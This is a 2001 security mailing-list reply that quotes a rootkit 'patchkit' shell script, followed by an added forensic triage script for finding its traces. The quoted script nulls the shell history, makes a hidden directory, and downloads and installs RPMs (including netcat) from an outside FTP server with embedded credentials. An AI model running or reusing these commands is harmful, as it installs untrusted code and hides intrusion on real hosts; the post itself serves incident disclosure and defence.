Security Incidents mailing list archives

Re: rootkit entertainment


From: tmiller <tmiller () va prestige net>
Date: Wed, 06 Jun 2001 09:05:25 -0400

I saw this version of t0rn back in Feb. The attackers used t666.c to 
exploit the box.

                                          Toby

A patch found in the source....

#!/bin/sh
inf="Patchkit by beast"

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''
 
echo "${GRN}Patching Sequence Started..."
echo "${YEL}Fixing history file in /bin"
echo "${DRED}RE-Initiating bash_history..."
echo "${GRN}Done, linked to /dev/null ;)"
rm -rf /bin/.bash_history
ln -s /dev/null /bin/.bash_history
echo "${DRED}Creating temp path..."
mkdir -p /usr/src/.puta/rpm
echo "${DWHI}*${GRN}-Connected to dumpsite-${DWHI}*"
echo "${DWHI}*************************"
cd /usr/src/.puta/rpm
echo "${DRED}Upgrading WU-FTP, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/wu.rpm
echo "${DRED}Executing WU upgrade...${GRN}"
rpm -Uv wu.rpm
echo "${DRED}Upgrading Statd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/stat.rpm
echo "${DRED}Executing Statd upgrade...${GRN}"
rpm -Uv stat.rpm
echo "${DRED}Upgrading Vixie, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/vixie.rpm
echo "${DRED}Executing Vixie upgrade...${GRN}"
rpm -Uv vixie.rpm
echo "${DRED}Upgrading BIND, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/bind.rpm
echo "${DRED}Executing BIND upgrade...${GRN}"
rpm -Uv bind.rpm
echo "${DRED}Upgrading Imapd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/imap.rpm
echo "${DRED}Executing Imapd upgrade...${GRN}"
rpm -Uv imap.rpm
echo "${DRED}Upgrading NC, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/nc.rpm
echo "${DRED}Executing NC upgrade...${GRN}"
rpm -Uv nc.rpm
echo "${YEL}Cleaning up old files..."
rm -rf /usr/src/.puta/patch
rm -rf /usr/src/.puta/rpm
echo "${GRN}Patching done${RES}"
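
A triage check for the traces the quoted script leaves on disk, as an added example that is not part of the original post or the kit. The function names, the ROOT argument and the extra history paths are assumptions of this example; the `/usr/src/.puta` and `/bin/.bash_history` paths come from the script above.

```shell
#!/bin/sh
# Added example: triage for the on-disk traces of the script quoted above.
# ROOT (an assumption of this example) is where the suspect filesystem is
# mounted: "/" on a live host, or e.g. /mnt/evidence for an image.

# Print one line per finding; return 0 if anything was found, else 1.
scan_patchkit_traces() {
    root="${1:-/}"; root="${root%/}"
    found=1

    # mkdir -p creates /usr/src/.puta, but the cleanup only removes the
    # patch/ and rpm/ subdirectories, so the parent directory survives.
    if [ -d "$root/usr/src/.puta" ]; then
        echo "DIR $root/usr/src/.puta"
        found=0
    fi

    # History files symlinked to /dev/null. The script does this for
    # /bin/.bash_history; the other paths are assumed additions.
    for h in "$root/bin/.bash_history" "$root/root/.bash_history" \
             "$root"/home/*/.bash_history; do
        [ -L "$h" ] || continue
        if [ "$(readlink "$h")" = "/dev/null" ]; then
            echo "HISTORY_NULL $h"
            found=0
        fi
    done
    return "$found"
}

# Read "<install-epoch> <package>" lines on stdin and print the packages
# installed within WINDOW seconds of EPOCH. On a live host the input can
# come from: rpm -qa --qf '%{INSTALLTIME} %{NAME}\n'
# and EPOCH from: stat -c %Y /usr/src/.puta   (GNU stat assumed)
pkgs_near() {
    awk -v t="$1" -v w="$2" \
        '{ d = $1 - t; if (d < 0) d = -d; if (d <= w) print $2 }'
}

if [ "${1:-}" = "--scan" ]; then
    scan_patchkit_traces "${2:-/}" || echo "no traces under ${2:-/}"
fi
```

Packages reported by `pkgs_near` were installed around the time the kit's directory was last modified and should be verified against vendor packages rather than trusted as legitimate upgrades.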
